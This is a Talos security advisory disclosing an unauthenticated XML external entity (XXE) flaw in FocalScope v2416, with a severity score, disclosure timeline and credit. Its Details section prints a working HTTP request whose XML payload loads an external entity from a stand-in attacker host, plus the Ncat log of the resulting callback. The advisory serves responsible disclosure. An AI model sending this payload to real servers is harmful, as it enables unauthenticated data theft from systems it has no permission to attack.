Talos Vulnerability Report

TALOS-2018-0559

FocalScope XML External Entity Injection Vulnerability

July 20, 2018
CVE Number

CVE-2018-3881

Summary

An exploitable unauthenticated XML external injection vulnerability was identified in FocalScope v2416. A unauthenticated attacker could submit a specially crafted web request to FocalScope's server that could cause an XXE, and potentially result in data compromise.

Tested Versions

FocalScope v2416

Product URLs

http://www.focalscope.com/download.html

CVSSv3 Score

9.4 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H

CWE

CWE-611: Improper Restriction of XML External Entity Reference ('XXE')

Details

FocalScope v2416 and prior is vulnerable to an unauthenticated XML External Entity injection attack. The following XML payload was used to trigger the XXE:

POST /emm/_cros_/xlogin.asp HTTP/1.1
Host: [IP]
Content-Length: 315
Origin: http://[IP]
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: text/xml; charset=UTF-8
Accept: /
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close

    <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://x.x.x.x/xxe"> %remote;%int;%trick;]><body><o i='msg'><s i='_url'>url:xlogin.asp</s><s i='_fnc'>GetSalt</s><o i='oParam'><s i='sUser'>PCSL</s><s i='sMyName'>self</s><s i='sCallback'>PutSalt</s></o></o></body>

    On the attacking Server the following request can be observed: 
Ncat: Connection from x.x.x.x.
Ncat: Connection from x.x.x.x.
GET /xxe HTTP/1.0
Accept: /
UA-CPU: AMD64
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: x.x.x.x
Connection: Keep-Alive

Note: It was also observed that pretty much any page which takes XML input in POST request is vulnerable to this vulnerability, regardless of whether pages are protected by authentication or not.

Timeline

2018-04-09 - Vendor Disclosure
2018-04-12 - Sent plain text file to vendor
2018-06-05 - 60 day follow up
2018-06-27 - Final follow up
2018-07-20 - Public Release

Credit

Discovered by Jerzy (Yuri) Kramarz of Security Advisory EMEAR